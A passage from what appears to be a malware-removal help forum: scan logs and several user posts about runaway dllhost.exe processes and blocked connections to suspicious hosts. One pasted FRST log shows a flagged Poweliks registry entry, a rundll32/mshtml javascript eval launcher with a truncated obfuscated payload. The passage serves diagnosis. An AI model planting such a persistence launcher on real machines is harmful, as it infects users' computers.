C:\Windows\SysWOW64\WindowsAccessBridge-32.dll 2014-10-23 10:31 - 2014-09-26 18:36 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe 2014-10-23 10:31 - 2014-09-26 18:36 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe 2014-10-23 10:31 - 2014-09-26 18:35 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe 2014-10-23 10:29 - 2014-10-23 10:31 - 00004195 _____ () C:\Windows\SysWOW64\jupdate-1.7.0_71-b14.log 2014-10-23 09:49 - 2014-10-26 22:38 - 00000000 ____D () C:\FRST 2014-10-21 11:20 - 2013-10-14 18:00 - 00028368 _____ (Microsoft Corporation) C:\Windows\system32\IEUDINIT.EXE 2014-10-15 13:37 - 2014-10-15 13:37 - 00002910 _____ () C:\Users\Jack\AppData\Local\recently-used.xbel 2014-10-14 22:08 - 2014-09-28 20:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys 2014-10-14 22:08 - 2014-09-12 21:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 2014-10-14 22:08 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-10-14 22:08 - 2014-09-04 01:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2014-10-14 22:08 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 05780480 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 00322560 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll 2014-10-14 22:08 - 2014-08-28 22:07 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll 2014-10-14 22:08 - 2014-08-28 22:06 - 01125888 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2014-10-14 22:08 - 2014-08-28 21:44 - 04922368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2014-10-14 22:08 - 2014-08-28 21:44 - 01050112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2014-10-14 22:08 - 2014-08-28 21:44 - 00269312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll 2014-10-14 22:08 - 2014-08-28 21:44 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-10-14 22:08 - 2014-07-16 22:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-10-14 22:08 - 2014-07-16 22:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-10-14 22:08 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2014-10-14 22:08 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-10-14 22:08 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-10-14 22:08 - 2014-07-16 21:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2014-10-14 22:08 - 2014-07-16 21:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2014-10-14 22:08 - 2014-06-18 18:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll 2014-10-14 22:08 - 2014-06-18 18:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00314880 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00307200 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll 2014-10-14 22:08 - 2014-05-30 04:08 - 00210944 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00259584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00247808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00220160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll 2014-10-14 22:08 - 2014-05-30 03:52 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll 2014-10-02 19:35 - 2014-10-02 19:35 - 00141237 _____ () C:\Users\Jack\Downloads\oscom_paypal_pro_payflow-3.1.zip ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-10-26 22:31 - 2011-06-04 09:46 - 00000000 ____D () C:\Users\Jack\Documents\Quicknote 2014-10-26 22:17 - 2012-04-08 12:31 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-10-26 22:03 - 2011-08-14 20:14 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-10-26 21:50 - 2009-07-14 01:10 - 02012760 _____ () C:\Windows\WindowsUpdate.log 2014-10-26 21:49 - 2009-07-14 00:45 - 00014560 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-10-26 21:49 - 2009-07-14 00:45 - 00014560 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-10-26 21:45 - 2011-08-02 07:59 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000UA.job 2014-10-26 21:45 - 2011-07-18 13:43 - 00000199 _____ () C:\Windows\wstdUPSWSHIP.INI 2014-10-26 21:44 - 2011-08-14 20:14 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-26 21:44 - 2011-07-16 07:39 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\The Bat! 2014-10-26 21:44 - 2011-03-10 15:20 - 00001419 _____ () C:\Users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-10-26 21:44 - 2011-03-10 15:20 - 00000000 ____D () C:\Users\Jack\AppData\Local\SoftThinks 2014-10-26 21:43 - 2012-09-01 13:34 - 00000000 ____D () C:\Program Files (x86)\CyberPower PowerPanel Personal Edition 2014-10-26 21:43 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-10-26 21:40 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\PolicyDefinitions 2014-10-26 21:29 - 2012-11-25 15:46 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update 2014-10-26 21:25 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\Web 2014-10-26 21:17 - 2011-04-16 07:58 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\SQLyog 2014-10-26 21:10 - 2013-09-14 09:54 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-10-26 21:08 - 2013-02-28 22:18 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Malwarebytes 2014-10-26 21:08 - 2013-02-28 22:18 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-10-26 20:38 - 2011-07-18 13:27 - 00000000 ____D () C:\UPS 2014-10-26 13:52 - 2011-08-02 07:59 - 00000000 ____D () C:\Users\Jack\AppData\Local\Google 2014-10-26 13:51 - 2011-08-14 20:14 - 00000000 ____D () C:\Program Files (x86)\Google 2014-10-26 12:45 - 2011-08-02 07:59 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000Core.job 2014-10-26 12:29 - 2011-09-14 11:39 - 00000000 ____D () C:\Storage 2014-10-26 10:26 - 2011-03-10 15:20 - 00000000 ____D () C:\Users\Jack\AppData\Local\VirtualStore 2014-10-26 01:01 - 2009-07-14 01:32 - 00000000 ____D () C:\Windows\system32\FxsTmp 2014-10-25 23:22 - 2012-12-14 10:50 - 00000000 ___RD () C:\Users\Jack\Sync 2014-10-25 22:52 - 2011-03-23 12:35 - 00000000 ____D () C:\Windows\Minidump 2014-10-25 22:19 - 2013-04-24 23:24 - 00000000 ____D () C:\ProgramData\Norton 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\IObit 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\ProgramData\IObit 2014-10-25 21:55 - 2014-05-12 12:06 - 00000000 ____D () C:\Program Files (x86)\IObit 2014-10-25 20:59 - 2012-12-23 15:19 - 00000000 ____D () C:\Users\Jack\AppData\Local\CrashDumps 2014-10-25 10:45 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\rescache 2014-10-25 08:51 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\zh-HK 2014-10-25 08:51 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\SysWOW64\tr-TR 2014-10-25 08:50 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\zh-HK 2014-10-25 08:50 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\tr-TR 2014-10-25 08:42 - 2011-06-11 21:18 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Arcsoft 2014-10-25 00:02 - 2011-02-09 15:03 - 00000000 ____D () C:\Windows\Panther 2014-10-24 22:15 - 2011-04-20 22:51 - 00000600 _____ () C:\Users\Jack\PUTTY.RND 2014-10-24 20:32 - 2011-05-18 03:30 - 00000000 ____D () C:\Windows\system32\inf32 2014-10-24 13:32 - 2011-07-15 09:58 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FileZilla 2014-10-23 10:31 - 2013-10-18 00:05 - 00000000 ____D () C:\ProgramData\Oracle 2014-10-23 10:31 - 2013-07-21 10:37 - 00000000 ____D () C:\Program Files (x86)\Java 2014-10-23 10:26 - 2014-07-02 21:37 - 00000000 ____D () C:\Users\Jack\AppData\Local\Adobe 2014-10-23 10:26 - 2012-04-08 12:31 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-10-23 10:26 - 2012-04-08 12:31 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater 2014-10-23 10:26 - 2011-05-21 11:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-10-23 10:22 - 2012-04-07 13:20 - 00002110 _____ () C:\Users\Jack\Sti_Trace.log 2014-10-21 22:58 - 2011-08-14 20:14 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-21 22:58 - 2011-08-14 20:14 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-21 12:40 - 2011-08-02 07:59 - 00003876 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000UA 2014-10-21 12:40 - 2011-08-02 07:59 - 00003480 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3994650508-1294297652-2827424591-1000Core 2014-10-21 11:06 - 2009-07-13 23:20 - 00000000 ____D () C:\Windows\system32\NDF 2014-10-19 21:24 - 2011-02-09 13:52 - 00000000 ____D () C:\Program Files (x86)\AlienRespawn 2014-10-17 22:56 - 2009-07-14 00:45 - 00353584 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-10-17 22:52 - 2009-07-14 01:13 - 00860406 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-10-17 22:45 - 2013-07-27 09:17 - 00000000 ____D () C:\Windows\system32\MRT 2014-10-17 13:26 - 2011-03-11 13:16 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Adobe 2014-10-17 13:26 - 2011-02-09 13:51 - 00000000 ____D () C:\ProgramData\Adobe 2014-10-15 20:05 - 2012-10-21 21:39 - 00000000 ____D () C:\Users\Jack\.gimp-2.8 2014-10-09 22:29 - 2011-12-29 22:05 - 00000000 ____D () C:\Users\Jack\AppData\Local\Apple Computer 2014-10-08 22:50 - 2011-12-29 22:05 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk 2014-10-08 22:39 - 2011-12-29 22:05 - 00155180 ____H () C:\Windows\SysWOW64\mlfcache.dat 2014-10-07 18:45 - 2009-07-14 01:08 - 00032586 _____ () C:\Windows\Tasks\SCHEDLGU.TXT 2014-10-03 10:02 - 2011-03-27 22:22 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe 2014-10-02 15:53 - 2011-03-13 00:25 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe 2014-10-01 11:11 - 2013-09-14 09:54 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-09-28 20:39 - 2012-04-26 07:48 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-26 16:53 ==================== End Of Log ============================
  15. Hi everyone, My problem is similar to what I have seen from multiple people on the site, but all the solutions are personalized so I was hoping someone could help me out with my problem. About a week ago my computer started running very slow, and when looking into it I saw many (8 or so) dllhost.exe processes running. The processes start themselves backup when ended. I noticed that when I restart my computer they don't appear until I connect to the internet (until then there are only 2). Also the slowing doesn't happen until I connect to the internet. I downloaded Malwarebytes and a malicious website blockage kept popping up. Most of the time there was no domain, but if there was it would be fff5ee.com or some blinkx website (I don't remember the exact name, but can get it if requested). The blockage was always through dllhost.exe though. I ran a scan with Malwarebytes and didn't find anything. I then changed the setting to add 'scan for rootkits' and reran. Found four threats and quarantined them. Didn't help. So then I downloaded and ran FRST. I attached the results from the second Malwarebytes scan and the FRST scan. Thanks in advance for the help! -Jeff Addition.txt FRST.txt MWB_log.txt
  16. Hello, the constant pop up of the Malicious Website Blocked is annoying me, it goes away then comes back after awhile the only process causing it is dllhost.exe but now it stopped there is the same process but it doesn't have "dllhost.exe*32 Com Surrogate" without it that process is harmless. It attempts outbound connections to the following: fff5ee.com (Most Common) IP: 31.184.192.90 port: 51197, 51324, 51327. Unknown Domain (Very Uncommon but happens) IP: 95.215.1.57 Port:511224, 51235, 51240. Sorry I took so long I was trying to gather all I could about these two.
  17. Hello! I've just finished all around sweeps for infections using MBAM, Super Antispyware, Spybot, Hitmanpro, Hijackthis, Tdsskiller, Kaspersky, and Avira. (Individually installed/removed to avoid conflicts) The machine is running well as of now, but MBAM is detecting dllhost.exe as an infection and it is constantly up. I've done a bit of googling and found that the file is a common target for specific types of infections, but I cannot make any modifications to the file. Any ideas? I've attatched a photo of the detection as well. Thanks in advance! FRST.txt Addition.txt
  18. Hello, new here, for the past few days, I have been noticing that several instances of dllhost.exe have been popping up, Taking up a TON of memory and CPU, only to be stopped by repetitive task ending. Let this be known: I personally have not pirated anything in a long time, due to the fact that I just didn't like the whole feel of it, BUT I allow my broke sister to use it sometimes and she tends to download stuff when she shouldn't and hides it where I don't find it. I know that some stuff may still be left over, but I've done a lot of cleaning up and there shouldn't be that much if anything left over. So, I've done several scans with Malwarebytes and by looking at other threads and posts by others around different sites as well, it'd seem that I need to get help from people who know what they're doing. Please. PLEASE Help me! It's super annoying and the addresses and IPs Malwarebytes is detected are very very concerning.
  19. I'm positive that my PC is infected by several virus/malware. Started with PC becoming slow at times and I ignored thinking it might be some usual windows/pc issues. Then few days later it started to freeze when opening google chrome. I scanned using bitdefender and found threats(something by the name 'tribalfusion' and a few others) which were removed. But the problems still persisted and pc was getting slower and slower, and I started suspecting a virus attack. Then it became sure when computer started behaving very weird - icons and shortcuts I didn't create found on the desktop, unable to run windows security, automatically changing the system time etc. I searched online and found a guide which suggested a comprehensive fix. The first step was running Kaspersky TDSSKiller which the virus prevented (crashed every time). Then I rebooted in safe mode and ran it again(without checking 'loaded modules') and this time it was running. This was followed by a series of antimalware programs(all running in safe mode) like malwarebytes antimalware, hitman pro, rogue killer etc. none of which found any potential threats. The condition of the system is the same and not yet fixed, and in the task manager I can see processes by the name 'dllhost.exe, ctfmon.exe, runtimebroker.exe' etc and several instances of svchost.exe which I'm sure are viruses. Please help me out as I prefer fixing the issue over reinstalling the OS which will be a big hassle for me. Thank you.
  20. so my computer keeps freezing and malwarebytes keeps blocking malicious websites from sysWOW64dllhost. Can somebody please help me. I stop all of the dllhost*32 processes but they just pop right back up I usually get about 30 of them at once. My Norton picks up nothing and my malwarebytes dosnt pick up anything either. I tried everything I can think of please help. My computer is useless like this because it keeps freezing up.
  21. This PC became infected before MalwareBytes was installed. It was runnint ESET antivirus software. The original symptom is CPU being completely maxed with MANY instances of dllhost / COM Surrogate running. These only get generated when connected to a network. With WIFI disabled, the PC does not generate these. After installing MalwareBytes Premium, numerous files were detected and cleaned, but the problem persists. In addition, every 3-5 seconds, MalwareBytes detects and blocks a "malicious website". These sites vary, but I see a lot of "95.215.1.57" and "fffsee.com". I ran FRST and below are the logs requested. Thank you for any help you are able to provide. FRST.TXT: =============================================================================================== Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 24-09-2014 Ran by Nikki (administrator) on LAPTOP-NIKKI on 24-09-2014 03:57:30 Running from H:\ Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (IDT, Inc.) C:\Program Files\IDT\WDM\stacsv.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (UPEK Inc.) C:\Program Files\Common Files\SPBA\upeksvr.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostControlService.exe (Broadcom Corporation) C:\Program Files\Broadcom Corporation\Broadcom USH Host Components\CV\bin\HostStorageService.exe (Wave Systems Corp.) C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmService.exe (Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AEstSrv.exe (APN LLC.) C:\Program Files\AskPartnerNetwork\Toolbar\apnmcp.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX86\officeclicktorun.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe (Pro Softnet Corporation) C:\IDrive\IDriveE Service.exe (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe (O2Micro International) C:\Windows\System32\drivers\o2flash.exe (Paramount Software UK Ltd) C:\Program Files\Macrium\Reflect\ReflectService.exe (Rosetta Stone Ltd.) C:\Program Files\RosettaStoneLtdServices\RosettaStoneDaemon.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE (Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgrSvc.exe (Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE (Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe ( ) C:\IDrive\IDrivePlugin.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (IDT, Inc.) C:\Program Files\IDT\WDM\sttray.exe () C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe (ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe (APN) C:\Program Files\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Dell Inc.) C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe (Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe (Intel Corporation) C:\Windows\System32\igfxext.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe (Pro Softnet Corp.) C:\IDrive\IDriveETray.exe (Pro-SoftNet Corp, U.S.A) C:\IDrive\IDriveEBackground.exe (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\MSOSYNC.EXE (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe (Microsoft Corporation) C:\Windows\System32\wuauclt.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX86\officec2rclient.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [505720 2011-07-20] (Alps Electric Co., Ltd.) HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [536668 2011-01-24] (IDT, Inc.) HKLM\...\Run: [FreeFallProtection] => C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe [686704 2010-12-17] () HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [5110672 2013-09-12] (ESET) HKLM\...\Run: [nwiz] => C:\Program Files\NVIDIA Corporation\nview\nwiz.exe [2602784 2013-12-04] () HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM\...\Run: [ApnTBMon] => C:\Program Files\AskPartnerNetwork\Toolbar\Updater\TBNotifier.exe [1942424 2014-08-29] (APN) Winlogon\Notify\spba: C:\Program Files\Common Files\SPBA\homefus2.dll (UPEK Inc.) HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...\Run: [iDriveE Startup] => C:\IDrive\IDrvieEStartup.exe [185800 2011-06-24] (Pro Softnet Corporation) HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-08-18] (Google Inc.) HKU\S-1-5-21-475017880-3412151489-2877756071-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! HKU\S-1-5-21-475017880-3412151489-2877756071-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [iDriveE Startup] => C:\IDrive\IDrvieEStartup.exe [185800 2011-06-24] (Pro Softnet Corporation) HKU\S-1-5-21-475017880-3412151489-2877756071-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-08-18] (Google Inc.) AppInit_DLLs: C:\Windows\system32\nvinit.dll => C:\Windows\system32\nvinit.dll [156256 2013-12-04] (NVIDIA Corporation) Lsa: [Authentication Packages] msv1_0 wvauth Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell System Manager.lnk ShortcutTarget: Dell System Manager.lnk -> C:\Program Files\Dell\Dell System Manager\DCPSysMgr.exe (Dell Inc.) Startup: C:\Users\Nikki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IDrive Tray.lnk ShortcutTarget: IDrive Tray.lnk -> C:\IDrive\IDriveEReg2ini.exe (Pro Softnet Corp.) ShellIconOverlayIdentifiers: EnabledUnlockedFDEIconOverlay -> {30D3C2AF-9709-4D05-9CF4-13335F3C1E4A} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.) ShellIconOverlayIdentifiers: UninitializedFdeIconOverlay -> {CF08DA3E-C97D-4891-A66B-E39B28DD270F} => C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Trusted Drive Manager\TdmIconOverlay.dll (Wave Systems Corp.) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/webhp?sourceid=navclient&ie=UTF-8&gws_rd=ssl SearchScopes: HKCU - DefaultScope {09CE4A42-A9A2-49DD-A0E0-06D95FCBB159} URL = http://www.search.ask.com/web?tpid=ORJ-ST-SPE&o=APN11460&pf=V7&p2=^BE6^OSJ000^YY^US&gct=&itbv=12.16.2.54&apn_uid=1F10A509-ADE8-4C22-8355-BB14ED0C6DA0&apn_ptnrs=BE6&apn_dtid=^OSJ000^YY^US&apn_dbr=ie_11.0.9600.17280&doi=2014-09-17&trgb=IE&q={searchTerms}&psv=&pt=tb SearchScopes: HKCU - URL 